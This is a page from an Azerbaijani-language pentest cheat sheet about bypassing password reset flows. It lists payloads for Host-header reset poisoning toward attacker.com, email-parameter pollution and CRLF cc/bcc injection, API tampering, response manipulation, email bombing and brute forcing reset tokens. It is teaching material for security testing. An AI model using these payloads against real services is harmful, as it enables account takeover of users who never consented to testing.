Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page
  • Password Reset Token Leak Via Referrer
  • Exploitation
  • Təsir
  • Password Reset Poisoning
  • Exploitation
  • Patch
  • Təsvir
  • Password Reset With Manipualating Email Parameter
  • Exploitation
  • API Parametrləri vasitəsilə istənilən İstifadəçinin E-poçt və Şifrəsinin Dəyişdirilməsi
  • Exploitation
  • No Rate Limiting: Email Bombing
  • Exploitation
  • Response manipulyasiyası: Bad Response-i good ilə əvəz etmək
  • Expired Tokendən istifadə
  • Brute Force Password Rest token
  • Tokeninizdən istifadə etməyə çalışın

Was this helpful?

  1. Web Pentesting

Reset/Forgotten Password Bypass

PreviousRegular expression Denial of Service - ReDoSNextSAML Hücumları

Last updated 1 year ago

Was this helpful?

Password Reset Token Leak Via Referrer

HTTP refereri, tələb olunan resursla əlaqələndirilmiş veb-səhifənin ünvanını müəyyən edən istəyə bağlı HTTP başlıq sahəsidir. İstinad sorğusu başlığı, hazırda tələb olunan səhifəyə keçidin izləndiyi əvvəlki veb səhifənin ünvanını ehtiva edir.

Exploitation

  • E-poçt ünvanınıza parol sıfırlamasını tələb edin

  • Parol sıfırlama linkinə klikləyin

  • Parolu dəyişməyin

  • İstənilən 3-cü tərəf saytlarına klikləyin (məsələn: Facebook, twitter)

  • Burpsuite proxy-də sorğuya müdaxilə edin

  • İstinad başlığının parol sıfırlama tokenini sızdığını yoxlayın.

Təsir

Müəyyən bir sayta nəzarət edən şəxsə istifadəçinin parolunu (CSRF hücumu) dəyişdirməyə imkan verir, çünki bu şəxs istifadəçinin parol sıfırlamasını bilir.

Password Reset Poisoning

Əgər host başlığı hücumu tapsanız və bu, əhatə dairəsindən kənardırsa, parol sıfırlama düyməsini tapmağa çalışın!

Exploitation

  • Burpsuite-də parol sıfırlama sorğusuna müdaxilə edin

  • Aşağıdakı başlığı əlavə edin və ya burpsuite başlığını redaktə edin (bir-bir cəhd edin)

Host: attacker.com
 Host: target.com
 X-Forwarded-Host: attacker.com
 Host: target.com
 Host: attacker.com

E-poçtun içindəki parolu dəyişdirmək üçün linkin attacker.com-a işarə edib-etmədiyini yoxlayın.

Patch

$_SERVER['HTTP_HOST'] əvəzinə $_SERVER['SERVER_NAME'] istifadə edin.

$resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";

Təsvir

Qurban öz e-poçtunda zərərli linki alacaq və kliklədikdə istifadəçinin parol sıfırlama linkini/tokenini təcavüzkara sızdıracaq və hesabın tam ələ keçirilməsinə səbəb olacaq.

Password Reset With Manipualating Email Parameter

Exploitation

  • Təcavüzkar e-poçtunu & istifadə edərək ikinci parametr kimi əlavə edin.

POST /resetPassword
[...]
[email protected]&[email protected]

%20 istifadə edərək ikinci parametr kimi təcavüzkar e-poçtunu əlavə edin.

POST /resetPassword
[...]
[email protected]%[email protected]

| istifadə edərək ikinci parametr kimi təcavüzkarın e-poçtunu əlavə edin.

POST /resetPassword
[...]
[email protected]|[email protected]

cc istifadə edərək ikinci parametr kimi təcavüzkar e-poçtunu əlavə edin.

POST /resetPassword
[...]
email="[email protected]%0a%0dcc:[email protected]"

Bcc istifadə edərək ikinci parametr kimi təcavüzkarın e-poçtunu əlavə edin.

POST /resetPassword
[...]
email="[email protected]%0a%0dbcc:[email protected]"

Təcavüzkar e-poçtunu istifadə edərək ikinci parametr kimi əlavə edin.

POST /resetPassword
[...]
email="[email protected]",email="[email protected]"

Json massivində ikinci parametr kimi təcavüzkar e-poçtunu əlavə edin.

POST /resetPassword
[...]
{"email":["[email protected]","[email protected]"]}

API Parametrləri vasitəsilə istənilən İstifadəçinin E-poçt və Şifrəsinin Dəyişdirilməsi

Exploitation

  • Təcavüzkar öz hesabı ilə daxil olmalı və Şifrəni dəyişdir funksiyasına keçməlidir

  • Burp Suite-i işə salın və sorğunu tutun

  • Sorğunu tutduqdan sonra onu repeater-ə göndərdi və E-poçt və Parol parametrlərini dəyişdirin

POST /api/changepass
[...]
("form": {"email":"[email protected]","password":"12345678"})

No Rate Limiting: Email Bombing

Exploitation

  • Burp Suite proqramını işə salın və parol sıfırlama sorğusuna müdaxilə edin

  • İntruder-ə göndərin

  • Null payload istifadə edin

Response manipulyasiyası: Bad Response-i good ilə əvəz etmək

Aşağıdakı kimi Sorğu və Cavab axtarın.

HTTP/1.1 401 Unauthorized
(“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)

Response dəyişdirin.

HTTP/1.1 200 OK
(“message”:”success”,”statusCode:200,”errorDescription”:”Success”)

Expired Tokendən istifadə

  • Müddəti bitmiş tokenin təkrar istifadə oluna biləcəyini yoxlayın.

Brute Force Password Rest token

Burpsuite istifadə edərək sıfırlama tokenini bruteforce etməyə çalışın.

POST /resetPassword
[...]
[email protected]&code=$BRUTE$

IP əsaslı tarif limitini keçmək üçün burpsuite-də IP-Rotator istifadə edin.

Tokeninizdən istifadə etməyə çalışın

  • Şifrə sıfırlama tokeninizi qurbanın Hesabına əlavə etməyə çalışın.

POST /resetPassword
[...]
[email protected]&code=$YOUR_TOKEN$